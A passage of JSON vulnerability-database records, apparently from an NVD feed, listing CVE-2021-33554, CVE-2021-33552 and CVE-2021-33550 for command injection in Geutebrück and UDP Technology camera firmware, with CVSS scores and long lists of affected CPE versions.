"cpe:/o:geutebrueck:g-code_een-2010_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_efd-2251_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-code_een-2040_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ebc-2112_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ebc-2111_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_efd-2241_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2239_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-code_een-2040_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_efd-2250_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ethc-2249_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ethc-2230_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2240_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ebc-2110_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ethc-2230_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ebc-2112_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ethc-2249_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_efd-2250_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2239_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-code_eec-2400_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ebc-2111_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_efd-2241_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-code_een-2010_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-code_eec-2400_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-code_eec-2400_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-code_een-2040_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2239_firmware:1.12.0.27"], "id": "CVE-2021-33554", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33554", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:geutebrueck:g-cam_ebc-2110_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2010_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2230_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2112_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_eec-2400_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2249_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2241_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2241_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2250_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2250_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2249_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2111_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2230_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2239_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_eec-2400_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2241_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_eec-2400_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2010_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2110_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2010_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2251_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2239_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2040_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2251_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2040_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2239_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2230_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2240_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2040_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2240_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2111_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2240_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2111_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2110_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2112_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2112_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2249_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2251_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2250_firmware:1.12.0.27:*:*:*:*:*:*:*"]}, {"lastseen": "2022-11-21T21:40:14", "description": "Multiple camera devices by UDP Technology, Geutebr\u00c3\u00bcck and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-13T18:15:00", "type": "cve", "title": "CVE-2021-33552", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33552"], "modified": "2022-11-21T19:36:00", "cpe": ["cpe:/o:geutebrueck:g-cam_ebc-2110_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2230_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_efd-2241_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_efd-2250_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ebc-2110_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ebc-2112_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2240_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-code_een-2010_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ethc-2240_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_efd-2251_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ebc-2111_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_efd-2251_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ethc-2249_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-code_een-2010_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_efd-2251_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-code_een-2040_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ebc-2112_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ebc-2111_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_efd-2241_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2239_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-code_een-2040_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_efd-2250_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ethc-2249_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ethc-2230_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2240_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ebc-2110_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ethc-2230_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ebc-2112_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ethc-2249_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_efd-2250_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2239_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-code_eec-2400_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ebc-2111_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_efd-2241_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-code_een-2010_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-code_eec-2400_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-code_eec-2400_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-code_een-2040_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2239_firmware:1.12.0.27"], "id": "CVE-2021-33552", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33552", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:geutebrueck:g-cam_ebc-2110_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2010_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2230_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2112_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_eec-2400_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2249_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2241_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2241_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2250_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2250_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2249_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2111_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2230_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2239_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_eec-2400_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2241_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_eec-2400_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2010_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2110_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2010_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2251_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2239_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2040_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2251_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2040_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2239_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2230_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2240_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2040_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2240_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2111_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2240_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2111_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2110_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2112_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2112_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2249_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2251_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2250_firmware:1.12.0.27:*:*:*:*:*:*:*"]}, {"lastseen": "2022-11-21T21:40:19", "description": "Multiple camera devices by UDP Technology, Geutebr\u00c3\u00bcck and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-13T18:15:00", "type": "cve", "title": "CVE-2021-33550", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33550"], "modified": "2022-11-21T19:36:00", "cpe": ["cpe:/o:geutebrueck:g-cam_ebc-2110_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2230_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_efd-2241_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_efd-2250_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ebc-2110_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ebc-2112_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2240_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-code_een-2010_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ethc-2240_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_efd-2251_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ebc-2111_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_efd-2251_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ethc-2249_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-code_een-2010_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_efd-2251_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-code_een-2040_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ebc-2112_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ebc-2111_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_efd-2241_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2239_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-code_een-2040_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_efd-2250_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ethc-2249_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ethc-2230_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2240_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ebc-2110_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ethc-2230_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ebc-2112_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ethc-2249_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_efd-2250_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2239_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-code_eec-2400_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ebc-2111_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_efd-2241_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-code_een-2010_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-code_eec-2400_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-code_eec-2400_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-code_een-2040_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2239_firmware:1.12.0.27"], "id": "CVE-2021-33550", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33550", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:geutebrueck:g-cam_ebc-2110_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2010_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2230_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2112_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_eec-2400_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2249_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2241_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2241_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2250_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2250_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2249_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2111_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2230_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2239_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_eec-2400_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2241_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_eec-2400_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2010_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2110_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2010_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2251_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2239_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2040_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2251_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2040_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2239_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2230_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2240_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2040_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2240_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2111_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2240_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2111_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2110_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2112_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2112_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2249_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2251_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2250_firmware:1.12.0.27:*:*:*:*:*:*:*"]}, {"lastseen": "2022-12-07T06:42:38", "description": "Multiple camera devices by UDP Technology, Geutebr\u00c3\u00bcck and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": 